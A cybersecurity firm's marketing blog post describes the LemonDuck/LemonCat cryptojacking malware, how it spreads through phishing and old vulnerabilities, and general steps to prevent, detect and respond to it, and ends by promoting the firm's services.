Skip to content

The Hidden Crypto-jacking Lemon Duck Malware. How to prevent, detect and respond?

Cryptocurrency is making news again. No, it is not in the financial world where there is always an endless debate about the legitimacy of cryptocurrencies and their uses for financial inclusion. This time it is the tech industry grappling with a modern crypto-mining malware called the Lemon Duck. (It is generally accompanied by a similar Malware called LemonCat). Lemon Duck, a crypto-jacking malware, that hijacks your computer system’s processing power to covertly mine cryptocurrency, like bitcoin, without you ever knowing. Let us understand how to prevent, detect and respond to Lemond Duck.

It was also found that the malware mines for Monero cryptocurrency. Now, the attackers are using new smokescreen methods to avoid detection. The LemonDuck (Cat) malware is “fileless,” meaning it leaves no trace on the network once its activities are complete. The malware’s ability to cover its tracks is perhaps the scariest of all.

A few other unique characteristics include:

  • Ability to infect both Windows, Microsoft Exchange Server, and enterprise-grade Linux systems.
  • Ability to use all your resources on the system to mine cryptocurrency.
  • Ability to eliminate other malware in the system to avoid other malware exploiting its vulnerabilities to gain access. In that way, it can shield itself from security patches or suspicion from SoC (Security Operations Center) analysts.
  • Uses its crypto-jacking and botnet capabilities to avoid detection tools.
  • Ability to continue to exploit old and forgotten vulnerabilities in the windows and Linux systems because the patches focus on popular and newer vulnerabilities.

Recent observations show that LemonDuck also steals credentials, removes security controls, spreads via emails, and moves laterally. It ultimately drops more tools for human-operated activity.

The malware is not new, however.  It was detected more than two years ago in China but is still considered a significant threat due to the reasons listed above. Now, we have detected its presence in several countries, including the US, Canada, India, Vietnam, Singapore, and almost the entirety of Europe.

Prevent Lemon Duck Malware

We have the usual suspects such as phishing emails, exploits, and USB devices when it comes to the initial spread. There were also reports of targeted attacks such as brute force attacks, spear-phishing attacks, business email compromise (BEC), and others.

Once the malware infects the device, it gains access to the Outlook application. It shares malicious emails on the victims’ behalf to spread the infection, making the phishing emails look more legitimate and hence, more dangerous.

The recent exponential increase in the attacks has seen the use of COVID-related themes in both subject and body, crafted to entice the victim to open the attachment. It was also found that the BEC emails include subjects such as goodbye, farewell letters, broken files; this is your order? These messages contain the malware PowerShell script hidden in a  .doc, .js, or a .zip file.

Hence, standard precautions against phishing emails, training, and awareness are required. Also, strict restrictions against the use of USB and control against opening email attachments are advised.

Detect and Respond to Lemon Duck

Microsoft, in a blog, mentioned that LemonDuck, LemonCat, and similar threats could be detected by close monitoring. Hence, companies can leverage solutions that offer visibility, detection, and response, such as MDR (Managed Detection & Response), EDR (Endpoint Detection & Response), XDR (Extended Detection and Response).  These solutions are configured to flag abnormalities and inconsistencies in communications, networks, and data exchange.

Once the anomaly is found, the system or device should be isolated. A thorough IoC (Indicators of Compromise) and Patient Zero analysis with various tools should be conducted. The goal is to understand the various attempts to change system-level files and registers, detect the malware, and disinfect the system.

After this, it is important to determine the scope of the infection.

  • Did the malware steal or copy sensitive information from the systems? If yes, is it available on the Dark Web?
  • Did it leave a backdoor to make it easy to come back?
  • What was the scope, and how many systems in the network did it spread through?

A detailed malware forensics analysis can determine all of these.

When should you call forensics experts?

As you would have realized, crypto-jackers are looking for a CPU-power to mine the internet for more coins. Hence, if you notice any unusual CPU-intensive tasks, it should be your cue to call in the experts. Watch out for:

  • Frequent machine heating
  • A sudden spike in usage of Server/CPU capacity
  • Unusual spike of processing at odd hours
  • Noticeable wastage leading to poor performance

Other than these, the Lemon duck/cat malware has a few indicators: internal spam mails (with COVID themes), mails with .js or similar extensions, large data copying or transfer incidents, and more.

The Alliant Advantage

The group behind both these “Lemon malware” is determined to stay anonymous and get a free fire to crypto wealth banking on your IT resources. It is time we, as a community, put a check on these bad actors.

Alliant Cybersecurity offers SoC as a Service, Malware Analysis, Patient Zero Identification, and other cybersecurity services. We are a team of technical experts and industry leaders with decades of experience in cybersecurity, professional services, and legislation.

Get the Alliant Cybersecurity advantage now!